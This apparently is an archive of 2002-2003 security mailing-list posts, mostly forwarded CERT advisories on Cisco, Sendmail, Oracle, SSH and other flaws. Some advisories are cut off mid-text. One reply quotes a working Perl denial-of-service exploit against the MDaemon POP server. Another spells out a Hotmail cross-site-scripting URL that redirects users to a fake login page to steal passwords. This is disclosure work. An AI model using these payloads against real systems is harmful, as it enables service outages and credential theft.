CERT Advisory CA-2003-15 Cisco IOS Interface Blocked by IPv4 Packet (fwd)
Regards Muhammad Faisal Rauf Danka *** There is an attachment in this mail. *** _ --- [ATTITUDEX.COM] http://www.attitudex.com/ --- _ Select your own custom email address for FREE! Get [EMAIL PROTECTED], No Ads, 6MB, IMAP, POP, SMTP more! http://www.everyone.net/selectmail?campaign=tag ---BeginMessage--- -BEGIN PGP SIGNED MESSAGE- CERT Advisory CA-2003-15 Cisco IOS Interface Blocked by IPv4 Packet Original release date: July 16, 2003 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * All Cisco devices running Cisco IOS software and configured to process Internet Protocol version 4 (IPv4) packets Overview A vulnerability in many versions of Cisco IOS could allow an intruder to execute a denial-of-service attack against a vulnerable device. I. Description Cisco IOS is a very widely deployed network operating system. A vulnerability in IOS could allow an intruder to execute a denial-of-service attack against an affected device. Cisco has publishedanadvisoryonthistopic,availableat http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml We strongly encourage sites using IOS to read this document and take appropriate action. The CERT/CC is tracking this issue as VU#411332. This reference number corresponds to CVE candidate CAN-2003-0567. II. Impact By sending specially crafted IPv4 packets to an interface on a vulnerable device, an intruder can cause the device to stop processing packets destined to that interface. Quoting from Cisco's advisory: A device receiving these specifically crafted IPv4 packets will force the inbound interface to stop processing traffic. The device may stop processing packets destined to the router, including routing protocol packets and ARP packets. No alarms will be triggered, nor will the router reload to correct itself. This issue can affect all Cisco devices running Cisco IOS software. This vulnerability may be exercised repeatedly resulting in loss of availability until a workaround has been applied or the device has been upgraded to a fixed version of code. III. Solution Apply a patch from Cisco Apply a patch as described in Cisco's Advisory. Until a patch can be applied, you can mitigate the risks presented by this vulnerability by judicious use of access control lists (ACLs). The correct use of ACLs depends of your network topology. Additionally, ACLs may degrade performace on some systems. We recommend reviewing the following before applying ACLs http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml#workarounds http://www.cisco.com/warp/public/707/racl.html http://www.cisco.com/warp/public/707/iacl.html _ The CERT Coordination Center thanks Cisco Systems of for notifying us about this problem and for helping us to construct this advisory. _ Feedback about this advisory may be directed to the author, Shawn Hernan __ This document is available from: http://www.cert.org/advisories/CA-2003-15.html __ CERT/CC Contact Information Email: [EMAIL PROTECTED] Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to [EMAIL PROTECTED] Please include in the body of your message subscribe cert-advisory * CERT and CERT Coordination Center are registered in the U.S. Patent and Trademark Office
CERT Advisory CA-2003-14 Buffer Overflow in Microsoft Windows HTML (fwd)
Regards Muhammad Faisal Rauf Danka *** There is an attachment in this mail. *** _ --- [ATTITUDEX.COM] http://www.attitudex.com/ --- _ Select your own custom email address for FREE! Get [EMAIL PROTECTED], No Ads, 6MB, IMAP, POP, SMTP more! http://www.everyone.net/selectmail?campaign=tag ---BeginMessage--- -BEGIN PGP SIGNED MESSAGE- CERT Advisory CA-2003-14 Buffer Overflow in Microsoft Windows HTML Conversion Library Original issue date: July 14, 2003 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Windows 98 and 98 Second Edition (SE) * Windows NT 4.0 and 4.0 Terminal Server Edition (TSE) * Windows Millennium Edition (Me) * Windows 2000 * Windows XP * Windows Server 2003 Overview A buffer overflow vulnerability exists in a shared HTML conversion library included in Microsoft Windows. An attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service. I. Description Microsoft Windows includes a shared HTML conversion library (html32.cnv). According to Microsoft Security Bulletin MS03-023, The HTML converter is an extension which allows applications to convert HTML data into Rich Text Format (RTF) while maintaining the formatting and structure of the data as well as the text. The converter also supports the conversion of RTF data into HTML. The HTML conversion library contains a buffer overflow vulnerability that can be triggered by a specially crafted align attribute in an HR element. The library can be loaded by any application on the system. For example, Internet Explorer (IE) uses the library to handle HTML data stored in the clipboard. Using script, an attacker can cause IE to copy a crafted HR element into the clipboard and load the library. The attacker could accomplish this by convincing a victim to view an HTML web page or HTML email message with IE, Outlook, or Outlook Express in a zone where Active scripting and Allow paste operations via script are enabled. This vulnerability is not limited to IE, Outlook, or Outlook Express. Any program, including non-Microsoft applications, can use the vulnerable library and may present other vectors of attack. Further information is available in VU#823260. Common Vulnerabilities and Exposures (CVE) refers to this issue as CAN-2003-0469. II. Impact An attacker could execute arbitrary code with the privileges of the process that loaded the HTML conversion library. The attacker could also crash the process, causing a denial of service. III. Solution Apply a patch Apply the appropriate patch as specified by Microsoft Security Bulletin MS03-023. Modify Internet Explorer security zone configuration Modify one or both of the following IE security zone settings in the Internet zone and the zone(s) used by Outlook, Outlook Express, and any other application that uses Internet Explorer or the WebBrowser ActiveX control to render HTML: * Set Allow paste operations via script to Disable * Set Active scripting to Disable Either of these changes will prevent attacks that depend on scripting in the IE HTML rendering engine. However, these changes are not complete solutions, and they do not prevent attacks that use other vectors. Note that disabling Active scripting provides defense against other attacks that are outside the scope of this document. Instructions for modifying IE 5 security zone settings can be found in the CERT/CC Malicious Web Scripts FAQ. In IE 6, the High security zone setting includes both of these changes. Appendix A. Vendor Information This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments. Microsoft Please see Microsoft Security Bulletin MS03-023. Appendix B. References * CERT/CC Vulnerability Note VU#823260 - http://www.kb.cert.org/vuls/id/823260 * Microsoft Security Bulletin MS03-023 - http://microsoft.com/technet/security/bulletin/MS03-023.asp _ This vulnerability was publicly reported by Digital Scream. _ Feedback can be directed to the author, Art Manion. __ This document is available from: http
Re: @(#)Mordred Labs advisory - Integer overflow in PHP str_repeat() function
Just to add a little more to what Mr Jedi said, Only allowing php code of the choice, may also endup in infinite loops causing denial of service. Including that, they may attempt to establish connection with other machines, within the LAN or imagine bruteforcing SQL servers on the internet, or bannergrabbing for that matter. Having the apache or nobody privileges, the attacker could do: - privilege escalation by using local vulnerabilities. - destroy/ delete/ tamper the logfiles. - destroy / delete/ tamper the webpages of other customers. - use it as a launchpad to attack other machines. - use it for mailbombing / spam / DoS / DDoS / Warez / Bouncing. Regards Muhammad Faisal Rauf Danka --- Jedi/Sector One [EMAIL PROTECTED] wrote: On Thu, Apr 03, 2003 at 08:39:03AM +0200, Goran Krajnovic wrote: This is a bit pointless, IMHO. 99% of PHP installations run the PHP code with the user-id of the web server process (usually a low privilege user like 'nobody' or 'apache'). [snip snip] If an attacker has the opportunity to execude PHP code of his choice on a target server [1], he does not need to exploit a buffer overflow in PHP just to get the privileges of the web server user You missed an important point. Hosting services offering a PHP interpreter to untrusted people rely on PHP features to restrict their field of action. Specifically, the open_basedir and safe_mode features are a must to avoid people going outside their home directory with PHP scripts. If arbitrary code can be run through a PHP vulnerability, these restrictions disappear. People can walk through files that are supposed to be inaccessible. Given that many people just chmod -R 777 their directories when their script doesn't work and leave plaintext SQL passwords everywhere, this is definitely ann issue. Also don't forget that all PHP extensions aren't always enabled. For instance, the socket extension is typically disabled by most hosting service providers for obvious reasons. Once and again, a vulnerability in the PHP interpreter can bypass this restriction and gain access to other machines of the LAN, run DOS agents, etc. Of course, one shouldn't rely 100% on PHP userland security barriers, this is where tools like NetBSD/OpenBSD's systrace can really add another efficient layer of security. -- __ /*- Frank DENIS (Jedi/Sector One) [EMAIL PROTECTED] -*\ __ \ '/a href=http://www.PureFTPd.Org/; Secure FTP Server /a\' / \/ a href=http://www.Jedi.Claranet.Fr/; Misc. free software /a \/ _ --- [ATTITUDEX.COM] http://www.attitudex.com/ --- _ Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, POP more! http://www.everyone.net/selectmail?campaign=tag
Fwd: CERT Advisory CA-2003-11 Multiple Vulnerabilities in Lotus Notes and Domino
Regards Muhammad Faisal Rauf Danka *** There is an attachment in this mail. *** _ --- [ATTITUDEX.COM] http://www.attitudex.com/ --- _ Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, POP more! http://www.everyone.net/selectmail?campaign=tag ---BeginMessage--- -BEGIN PGP SIGNED MESSAGE- CERT Advisory CA-2003-11 Multiple Vulnerabilities in Lotus Notes and Domino Original release date: March 26, 2003 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Lotus Notes and Domino versions prior to 5.0.12 and 6.0 Gold * VU#571297 affects 5.0.12, 6.0.1 and prior versions. Overview Multiple vulnerabilities have been reported to affect Lotus Notes clients and Domino servers. Multiple reporters, the close timing, and some ambiguity caused confusion about what releases are vulnerable. We are issuing this advisory to help clarify the details of the vulnerabilities, the versions affected, and the patches that resolve these issues. I. Description In February 2003, NGS Software released several advisories detailing vulnerabilities affecting Lotus Notes and Domino. The following vulnerabilities reported by NGS Software affect versions of Lotus Domino prior to 5.0.12 and 6.0: VU#206361 - Lotus iNotes vulnerable to buffer overflow via PresetFields FolderName field Lotus Technical Documentation: KSPR5HUQ59 NGS Software's Advisory: NISR17022003b VU#355169 - Lotus Domino Web Server vulnerable to denial of service via incomplete POST request Lotus Technical Documentation: KSPR5HTQHS NGS Software's Advisory: NISR17022003d VU#542873 - Lotus iNotes vulnerable to buffer overflow via PresetFields s_ViewName field Lotus Technical Documentation: KSPR5HUPEK NGS Software's Advisory: NISR17022003b VU#772817 - Lotus Domino Web Server vulnerable to buffer overflow via non-existent h_SetReturnURL parameter with an overly long Host Header field Lotus Technical Documentation: KSPR5HTLW6 NGS Software's Advisory: NISR17022003a The following vulnerability reported by NGS Software affects versions of Lotus Domino up to and including 5.0.12 and 6.0.1: VU#571297 - Lotus Notes and Domino COM Object Control Handler contains buffer overflow Lotus Technical Documentation: SWG21104543 NGS Software's Advisory: NISR17022003e VU#571297 was originally reported as a vulnerability in an iNotes ActiveX control. The vulnerable code is not specific to iNotes or ActiveX. The iNotes ActiveX control was an attack vector for the vulnerability and is not the affected code base. Because this issue is not specific to ActiveX, Lotus Notes clients and Domino Servers running on platforms other than Microsoft Windows may be affected. In March 2003, Rapid7, Inc. released several advisories. The following vulnerabilities, reported by Rapid7, Inc., affect versions of Lotus Domino prior to 5.0.12: VU#433489 - Lotus Domino Server susceptible to a pre-authentication buffer overflow during Notes authentication Lotus Technical Documentation: DBAR5CJJJS Rapid7, Inc.'s Advisory: R7-0010 VU#411489 - Lotus Domino Web Retriever contains a buffer overflow vulnerability Lotus Technical Documentation: KSPR5DFJTR Rapid7, Inc.'s Advisory: R7-0011 Rapid7, Inc. also discovered that Lotus Domino pre-release and beta versions of 6.0 were also affected by the following vulnerability: VU#583184 - Lotus Domino R5 Server Family contains multiple vulnerabilities in LDAP handling code Lotus Technical Documentation: DWUU4W6NC8 Rapid7, Inc.'s Advisory: R7-0012 VU#583184 was a regression of the PROTOS LDAP Test-Suite from CA-2001-18 and was originally fixed in 5.0.7a. II. Impact The impact of these vulnerabilities range from denial of service to data corruption and the potential to execute arbitrary code. For details about the impact of a specific vulnerability, please see the related vulnerability note. III. Solution Upgrade Most of these vulnerabilities are resolved in versions 5.0.12 and 6.0.1 of Lotus Domino. Only VU#571297, Lotus Notes and Domino COM Object Control Handler contains buffer overflow, is not resolved in 5.0.12, or 6.0.1. Critical Fix 1 for 6.0.1 was released on March 18, 2003, to resolve this issue for both the Notes client and Domino server. Apply a patch Patches are available for some vulnerabilities. Please view
Fwd: CERT Advisory CA-2003-10 Integer overflow in Sun RPC XDR library routines
*** There is an attachment in this mail. *** _ --- [ATTITUDEX.COM] http://www.attitudex.com/ --- _ Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, POP more! http://www.everyone.net/selectmail?campaign=tag ---BeginMessage--- -BEGIN PGP SIGNED MESSAGE- CERT Advisory CA-2003-10 Integer overflow in Sun RPC XDR library routines Original release date: March 19, 2003 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected Applications using vulnerable implementations of SunRPC-derived XDR libraries, which include * Sun Microsystems network services library (libnsl) * BSD-derived libraries with XDR/RPC routines (libc) * GNU C library with sunrpc (glibc) Overview There is an integer overflow in the xdrmem_getbytes() function distributed as part of the Sun Microsystems XDR library. This overflow can cause remotely exploitable buffer overflows in multiple applications, leading to the execution of arbitrary code. Although the library was originally distributed by Sun Microsystems, multiple vendors have included the vulnerable code in their own implementations. I. Description XDR (external data representation) libraries are used to provide platform-independent methods for sending data from one system process to another, typically over a network connection. Such routines are commonly used in remote procedure call (RPC) implementations to provide transparency to application programmers who need to use common interfaces to interact with many different types of systems. The xdrmem_getbytes() function in the XDR library provided by Sun Microsystems contains an integer overflow that can lead to improperly sized dynamic memory allocation. Depending on how and where the vulnerable xdrmem_getbytes() function is used, subsequent problems like buffer overflows may result. Researchers at eEye Digital Security discovered this vulnerability and have also published an advisory. This issue is currently being tracked as VU#516825 by the CERT/CC and as CAN-2003-0028 in the Common Vulnerabilities and Exposures (CVE) dictionary. Note that this vulnerability is similar to, but distinct from, VU#192995. II. Impact Because SunRPC-derived XDR libraries are used by a variety of vendors in a variety of applications, this defect may lead to a number of security problems. Exploiting this vulnerability will lead to denial of service, execution of arbitrary code, or the disclosure of sensitive information. Specific impacts reported include the ability to crash the rpcbind service and possibly execute arbitrary code with root privileges. In addition, intruders may be able to crash the MIT KRB5 kadmind or cause it to leak sensitive information, such as secret keys. III. Solution Apply a patch from your vendor Apply the appropriate patch or upgrade as specified by your vendor. See Appendix A below and the Systems Affected section of VU#516825 for further information. Note that XDR libraries can be used by multiple applications on most systems. It may be necessary to upgrade or apply multiple patches and then recompile statically linked applications. Applications that are statically linked must be recompiled using patched libraries. Applications that are dynamically linked do not need to be recompiled; however, running services need to be restarted in order to use the patched libraries. System administrators should consider the following process when addressing this issue: 1. Patch or obtain updated XDR/RPC libraries. 2. Restart any dynamically linked services that make use of the XDR/RPC libraries. 3. Recompile any statically linked applications using the patched or updated XDR/RPC libraries. Disable access to vulnerable services or applications Until patches are available and can be applied, you may wish to disable access to services or applications compiled with the vulnerable xdrmem_getbytes() function. As a best practice, the CERT/CC recommends disabling all services that are not explicitly required. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Apple Computer, Inc. Mac OS X
Fwd: CERT Advisory CA-2003-07 Remote Buffer Overflow in Sendmail
*** There is an attachment in this mail. *** _ --- [ATTITUDEX.COM] http://www.attitudex.com/ --- _ Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, POP more! http://www.everyone.net/selectmail?campaign=tag ---BeginMessage--- -BEGIN PGP SIGNED MESSAGE- CERT Advisory CA-2003-07 Remote Buffer Overflow in Sendmail Original release date: March 3, 2003 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Sendmail Pro (all versions) * Sendmail Switch 2.1 prior to 2.1.5 * Sendmail Switch 2.2 prior to 2.2.5 * Sendmail Switch 3.0 prior to 3.0.3 * Sendmail for NT 2.X prior to 2.6.2 * Sendmail for NT 3.0 prior to 3.0.3 * Systems running open-source sendmail versions prior to 8.12.8, including UNIX and Linux systems Overview There is a vulnerability in sendmail that may allow remote attackers to gain the privileges of the sendmail daemon, typically root. I. Description Researchers at Internet Security Systems (ISS) have discovered a remotely exploitable vulnerability in sendmail. This vulnerability could allow an intruder to gain control of a vulnerable sendmail server. Most organizations have a variety of mail transfer agents (MTAs) at various locations within their network, with at least one exposed to the Internet. Since sendmail is the most popular MTA, most medium-sized to large organizations are likely to have at least one vulnerable sendmail server. In addition, many UNIX and Linux workstations provide a sendmail implementation that is enabled and running by default. Thisvulnerabilityismessage-orientedasopposedto connection-oriented. That means that the vulnerability is triggered by the contents of a specially-crafted email message rather than by lower-level network traffic. This is important because an MTA that does not contain the vulnerability will pass the malicious message along to other MTAs that may be protected at the network level. In other words, vulnerable sendmail servers on the interior of a network are still at risk, even if the site's border MTA uses software other than sendmail. Also, messages capable of exploiting this vulnerability may pass undetected through many common packet filters or firewalls. Sendmail has indicated to the CERT/CC that this vulnerability has been successfully exploited in a laboratory environment. We do not believe that this exploit is available to the public. However, this vulnerability is likely to draw significant attention from the intruder community, so the probability of a public exploit is high. A successful attack against an unpatched sendmail system will not leave any messages in the system log. However, on a patched system, an attempt to exploit this vulnerability will leave the following log message: Dropped invalid comments from header address Although this does not represent conclusive evidence of an attack, it may be useful as an indicator. A patched sendmail server will drop invalid headers, thus preventing downstream servers from receiving them. The CERT/CC is tracking this issue as VU#398025. This reference number corresponds to CVE candidate CAN-2002-1337. For more information, please see http://www.sendmail.org http://www.sendmail.org/8.12.8.html http://www.sendmail.com/security/ http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950 http://www.kb.cert.org/vuls/id/398025 II. Impact Successful exploitation of this vulnerability may allow an attacker to gain the privileges of the sendmail daemon, typically root. Even vulnerable sendmail servers on the interior of a given network may be at risk since the vulnerability is triggered from the contents of a malicious email message. III. Solution Apply a patch from Sendmail Sendmail has produced patches for versions 8.9, 8.10, 8.11, and 8.12. However, the vulnerability also exists in earlier versions of the code; therefore, site administrators using an earlier version are encouraged to upgrade to 8.12.8. These patches are located at ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.security.cr.patch ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.security.cr.patch ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.9.3.security.cr.patch Apply a patch from your vendor Many vendors include vulnerable sendmail servers as part of their software distributions. We have notified vendors
Fwd: CERT Advisory CA-2003-05 Multiple Vulnerabilities in Oracle Servers
*** There is an attachment in this mail. *** _ Tenha seu E-mail Grátis @priorityzero.com o domínio diz tudo: Urgente !! Subscreva através do nosso site http://priorityzero.mail.everyone.net Subscribe for your Free URGENT @priorityzero.com E-mail click the link below http://priorityzero.mail.everyone.net _ Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, POP more! http://www.everyone.net/selectmail?campaign=tag ---BeginMessage--- -BEGIN PGP SIGNED MESSAGE- CERT Advisory CA-2003-05 Multiple Vulnerabilities in Oracle Servers Original release date: February 19, 2003 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Systems running Oracle9i Database (Release 1 and 2) * Systems running Oracle8i Database v 8.1.7 * Systems running Oracle8 Database v 8.0.6 * Systems running Oracle9i Application Server (Release 9.0.2 and 9.0.3) Overview Multiple vulnerabilities exist in Oracle software that may lead to execution of arbitrary code; the ability to read, modify, or delete information stored in underlying Oracle databases; or denial of service. All of these vulnerabilites were discovered by Next Generation Security Software Ltd. I. Description Multiple vulnerabilities exist in Oracle9i Application Server, Oracle9i Database, and Oracle8i Database. The majority of these vulnerabilities are buffer overflows. Oracle has published Security Alerts describing these vulnerabilities. If you use Oracle products listed in the Systems Affected section of this document, we strongly encourage you to review the following Oracle Security Alerts and apply patches as appropriate: * Buffer Overflow in DIRECTORY parameter of Oracle9i Database Server http://otn.oracle.com/deploy/security/pdf/2003alert48.pdf * Buffer Overflow in TZ_OFFSET function of Oracle9i Database Server http://otn.oracle.com/deploy/security/pdf/2003alert49.pdf * Buffer Overflow in TO_TIMESTAMP_TZ function of Oracle9i Database Server http://otn.oracle.com/deploy/security/pdf/2003alert50.pdf * Buffer Overflow in ORACLE.EXE binary of Oracle9i Database Server http://otn.oracle.com/deploy/security/pdf/2003alert51.pdf * Two Vulnerabilities in Oracle9i Application Server http://otn.oracle.com/deploy/security/pdf/2003alert52.pdf NGSSoftware Insight Security Research Advisories describing these issues are listed below: * Oracle9i Application Server Format String Vulnerability http://www.nextgenss.com/advisories/ora-appservfmtst.txt * Oracle TO_TIMESTAMP_TZ Remote System Buffer Overrun http://www.nextgenss.com/advisories/ora-tmstmpbo.txt * ORACLE bfilename function buffer overflow vulnerability http://www.nextgenss.com/advisories/ora-bfilebo.txt * Oracle TZ_OFFSET Remote System Buffer Overrun http://www.nextgenss.com/advisories/ora-tzofstbo.txt * Oracle unauthenticated remote system compromise http://www.nextgenss.com/advisories/ora-unauthrm.txt The CERT/CC has published vulnerability notes for each of these issues as well. The vulnerability in Oracle's mod_dav module (VU#849993) has been as assigned CVE ID CAN-2002-0842. II. Impact Depending on the vulnerability being exploited, an attacker may be able to execute arbitrary code; read, modify, or delete information stored in underlying Oracle databases; or cause a denial of service. The vulnerabilities in ORACLE.EXE (VU#953746) and the WebDAV modules (VU#849993, VU#511194) may be exploited prior to authentication. III. Solution Apply a patch Solutions for specific vulnerabilities can be found in the above referenced Oracle Security Alerts, NGSSoftware Insight Security Research Advisories, and individual CERT/CC Vulnerability Notes. Mitigation Strategies Until a patch can be applied, the CERT/CC recommends that vulnerable sites * disable unnecessary Oracle services * run Oracle services with the least privilege * restrict network access to Oracle services Appendix A. Vendor Information This appendix contains information provided by vendors. When vendors report new information, this section is updated and the changes are noted in the revision history. If a vendor is not listed below, we have not received their comments. Oracle Corporation Please see the following Oracle Security Alerts: * http://otn.oracle.com/deploy/security/pdf/2003alert48.pdf * http://otn.oracle.com/deploy/security/pdf/2003alert49.pdf * http://otn.oracle.com/deploy/security/pdf/2003alert50.pdf *
Fwd: CERT Advisory CA-2002-36 Multiple Vulnerabilities in SSH Implementations
*** There is an attachment in this mail. *** _ --- [ATTITUDEX.COM] http://www.attitudex.com/ --- _ Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, POP more! http://www.everyone.net/selectmail?campaign=tag ---BeginMessage--- -BEGIN PGP SIGNED MESSAGE- CERT Advisory CA-2002-36 Multiple Vulnerabilities in SSH Implementations Original issue date: December 16, 2002 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Secure shell (SSH) protocol implementations in SSH clients and servers from multiple vendors Overview Multiple vendors' implementations of the secure shell (SSH) transport layer protocol contain vulnerabilities that could allow a remote attacker to execute arbitrary code with the privileges of the SSH process or cause a denial of service. The vulnerabilities affect SSH clients and servers, and they occur before user authentication takes place. I. Description The SSH protocol enables a secure communications channel from a client to a server. From the IETF draft SSH Transport Layer Protocol: The SSH transport layer is a secure low level transport protocol. It provides strong encryption, cryptographic host authentication, and integrity protection Key exchange method, public key algorithm, symmetric encryption algorithm, message authentication algorithm, and hash algorithm are all negotiated. Rapid7 has developed a suite (SSHredder) of test cases that examine the connection initialization, key exchange, and negotiation phase (KEX, KEXINIT) of the SSH transport layer protocol. The suite tests the way an SSH transport layer implementation handles invalid or incorrect packet and string lengths, padding and padding length, malformed strings, and invalid algorithms. The test suite has demonstrated a number of vulnerabilities in different vendors' SSH products. These vulnerabilities include buffer overflows, and they occur before any user authentication takes place. SSHredder was primarily designed to test key exchange and other processes that are specific to version 2 of the SSH protocol; however, certain classes of tests are also applicable to version 1. Further information about this set of vulnerabilities may be found in Vulnerability Note VU#389665. Rapid7 has published a detailed advisory (R7-0009) and the SSHredder test suite. Common Vulnerabilities and Exposures (CVE) has assigned the following candidate numbers for several classes of tests performed by SSHredder: * CAN-2002-1357 - incorrect field lengths * CAN-2002-1358 - lists with empty elements or multiple separators * CAN-2002-1359 - classic buffer overflows * CAN-2002-1360 - null characters in strings II. Impact The impact will vary for different vulnerabilities and products, but in severe cases, remote attackers could execute arbitrary code with the privileges of the SSH process. Both SSH servers and clients are affected, since both implement the SSH transport layer protocol. On Microsoft Windows systems, SSH servers commonly run with SYSTEM privileges, and on UNIX systems, SSH daemons typically run with root privileges. In the case of SSH clients, any attacker-supplied code would run with the privileges of the user who started the client program, with the possible exception of SSH clients that may be configured with an effective user ID of root (setuid root). Attackers could also crash a vulnerable SSH process, causing a denial of service. III. Solution Apply a patch or upgrade Apply the appropriate patch or upgrade as specified by your vendor. See Appendix A below and the Systems Affected section of VU#389665 for specific information. Restrict access Limit access to SSH servers to trusted hosts and networks using firewalls or other packet-filtering systems. Some SSH servers may have the ability to restrict access based on IP addresses, or similar effects may be achieved by using TCP wrappers or other related technology. SSH clients can reduce the risk of attacks by only connecting to trusted servers by IP address. While these workarounds will not prevent exploitation of these vulnerabilities, they will make attacks somewhat more difficult, in part by limiting the number of potential sources of attacks. Appendix A. Vendor Information This appendix contains information provided by vendors. When vendors report new information, this section is
CERT Advisory CA-2002-35 Vulnerability in RaQ 4 Servers (fwd)
for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to [EMAIL PROTECTED] Please include in the body of your message subscribe cert-advisory * CERT and CERT Coordination Center are registered in the U.S. Patent and Trademark Office. __ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an as is basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History December 11, 2002: Initial release -BEGIN PGP SIGNATURE- Version: PGP 6.5.8 iQCVAwUBPfe3rGjtSoHZUTs5AQGi9gP/YKUB3k9mabWL7w3OYun7zPpsYqtRRFgE zpG77X/wKuHoUjxMArn0thzBeGmpmM0WJ7o3boggArwmgLgm6XQTJyg76JDHKEU5 /ozCZnhd4C39veE08rL1qQgXYIlo56QIANDdCnBchl6Fe/41XYjKblIhlxItRfbM 2bpmCCLvQzk= =5ayh -END PGP SIGNATURE- Regards Muhammad Faisal Rauf Danka _ --- [ATTITUDEX.COM] http://www.attitudex.com/ --- _ Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, POP more! http://www.everyone.net/selectmail?campaign=tag
Re: MDaemon SMTP/POP/IMAP server DoS
There have been earlier issues with UIDL and DoS conditions in MDaemon 2.8.5.0 (to be specific). Check bid 1366, http://online.securityfocus.com/bid/1366/ The website still offers 6.0.7 (vulnerable) version for download, So apparently no workaround exists except for shutting it down until the patch or newer version is available. Regards Muhammad Faisal Rauf Danka Head of GemSEC / Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk Key Id: 0x784B0202 Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202 --- D4rkGr3y [EMAIL PROTECTED] wrote: ## #Product: MDaemon SMTP/POP/IMAP server # #Authors: Alt-N Technologies Ltd [www.mdaemon.com] # #Vulnerable versions: v.6.0.7 and bellow # #Vulnerability: buffer overflow # #Bugexploit by D4rkGr3y [www.dhgroup.org] # ## #Overview#--# From MDaemon's help file: MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services commonplace on UNIX hosts and the Internet to Windows based servers and microcomputers. MDaemon is designed to manage the email needs of any number of individual users and comes complete with a powerful set of integrated tools for managing mail accounts and message formats. MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete with LDAP support, an integrated browser-based email client, content filtering, spam blockers, extensive security features, and more. #Problem## Bug founded in MDaemon's pop-server. It's possible to kill MDaemon by sending long arguments (32b and above) with DELE or UIDL commands. To do this u must have at least mail-account on vulnerable host. After geting long request from client, all MDaemon's Services will be closed (smtp, imap, pop, (?)worldclient). Here the log of attack on local MDaemon POP-server: +OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 MDAEMON-F200210 [EMAIL PROTECTED] USER D4rkGr3y +OK D4rkGr3y... Recipient ok PASS cool-pass +OK [EMAIL PROTECTED]'s mailbox has 1 total messages (18356 octets). UIDL Connection to host lost... #Exploit## #!/usr/bin/perl #MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y use IO::Socket; $host = [vuln_host]; $login = [login]; $pass = [pass]; $port = 110; $data = 1; $num = 32; $buf .= $data x $num; $socket = IO::Socket::INET-new(PeerAddr = $host, PeerPort = $port, Proto = tcp, Type = SOCK_STREAM) or die Couldn't connect: @!\n; print $socket USER $login\n; print $socket PASS $user\n; print $socket UIDL $buf\n; close($socket); #EOF Best regards www.dhgroup.org D4rkGr3yicq 540981 _ --- [ATTITUDEX.COM] http://www.attitudex.com/ --- _ Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, POP more! http://www.everyone.net/selectmail?campaign=tag
Re: XSS bug in hotmail login page
A lot can happen for sure, but i tried one myself, to redirect the request to some other webpage. One can make a fake hotmail page asking for password storing it locally in a text file and then again redirect to the original hotmail page. Usint this method one could steal passwords of hotmail/MSN users. We have all see previously people making hotmail looking page, asking you to first login through it, or asking you to send your login/pass along with the login name with the person you want to get hacked (all nasty scams like that). Now if it is not fixed they will have an easy way to trick them by asking them to visit hotmail new policy at : http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=id=2fs=1cb=;scriptlocation.replace(http://www.ownhomepage.com/frames/hotmailfake.html;);/scriptct=1033054530_setlang= And then have a fake setup to trick them entering their passwords at: http://www.ownhomepage.com/frames/hotmailfake.html Regards Muhammad Faisal Rauf Danka Head of GemSEC / Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk Key Id: 0x784B0202 Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202 _ --- [ATTITUDEX.COM] http://www.attitudex.com/ --- _ Select your own custom email address for FREE! Get [EMAIL PROTECTED] w/No Ads, 6MB, POP more! http://www.everyone.net/selectmail?campaign=tag
